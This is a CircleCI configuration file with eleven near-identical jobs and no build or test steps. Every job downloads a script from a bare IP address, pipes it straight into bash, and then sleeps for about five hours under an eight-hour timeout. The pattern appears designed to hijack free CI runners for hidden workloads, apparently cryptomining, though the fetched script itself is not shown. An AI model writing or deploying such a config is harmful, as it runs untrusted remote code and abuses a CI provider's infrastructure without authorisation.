version: 2.1

jobs:
  rubyhadfa:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 3hdgfh482"
            no_output_timeout: 8h

  rubyhadfa1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 6gdf452"
            no_output_timeout: 8h

  rubyhadfa2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 334sdf82"
            no_output_timeout: 8h

  rubyhadfa3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 4hss582"
            no_output_timeout: 8h

  rubyhadfa4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34hdf632"
            no_output_timeout: 8h

  rubyhadfa5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 348fdf24563"
            no_output_timeout: 8h

  rubyhadfa6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34dsd8463"
            no_output_timeout: 8h

  rubyhadfa7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34ds86342"
            no_output_timeout: 8h

  rubyhadfa8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 3342ds482"
            no_output_timeout: 8h

  rubyhadfa9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 343sd482"
            no_output_timeout: 8h

  rubyhadfa10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://54.179.182.247/aa.sh | bash -
      - run: 
            command: sleep 17980; echo "Hola 34s263482"
            no_output_timeout: 8h

workflows:
  main:
    jobs:
      - rubyhadfa
      - rubyhadfa1
      - rubyhadfa2
      - rubyhadfa3
      - rubyhadfa4
      - rubyhadfa5
      - rubyhadfa6
      - rubyhadfa7
      - rubyhadfa8
      - rubyhadfa9
      - rubyhadfa10
